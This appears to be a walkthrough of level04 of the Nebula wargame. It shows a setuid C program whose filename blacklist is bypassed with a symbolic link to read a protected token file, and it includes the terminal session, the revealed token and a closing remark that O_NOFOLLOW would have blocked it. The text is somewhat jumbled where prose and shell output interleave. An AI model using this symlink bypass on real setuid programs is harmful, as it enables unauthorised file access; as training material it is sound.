In level04 of Nebula wargame, we are tasked to exploit flag04 binary to read a token file. The source code of the binary is provided.
The part of the source in bold is responsible for checking that we are notproviding "token" as the filename to be read.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
int main(int argc, char **argv, char **envp)
{
char buf[1024];
int fd, rc;
if(argc == 1) {
printf("%s [file to read]\n", argv[0]);
exit(EXIT_FAILURE);
}
if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);
exit(EXIT_FAILURE);
}
fd = open(argv[1], O_RDONLY);
if(fd == -1) {
err(EXIT_FAILURE, "Unable to open %s", argv[1]);
}
rc = read(fd, buf, sizeof(buf));
if(rc == -1) {
err(EXIT_FAILURE, "Unable to read fd %d", fd);
}
write(1, buf, rc);
}
level04@nebula:/home/flag04$ ls -ltotal 12The trick is, we can access token indirectly, through a symbolic link.
-rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
-rw------- 1 flag04 flag04 37 2011-11-20 21:52 token
level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'
level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/pwn04That is it! Now we can login into the flag04 account using the content of token as the password
level04@nebula:/home/flag04$ ls -l
/tmp/pwn04 lrwxrwxrwx 1 level04 level04 18
2012-10-29 04:26 /tmp/pwn04 -> /home/flag04/token
level04@nebula:/home/flag04$ ./flag04 /tmp/pwn04
06508b5e-8909-4f38-b630-fdb148a848a2
flag04@nebula:~$ getflagthe open(2) system call would have failed if the O_NOFOLLOW flag was provided.
You have successfully executed getflag on a target account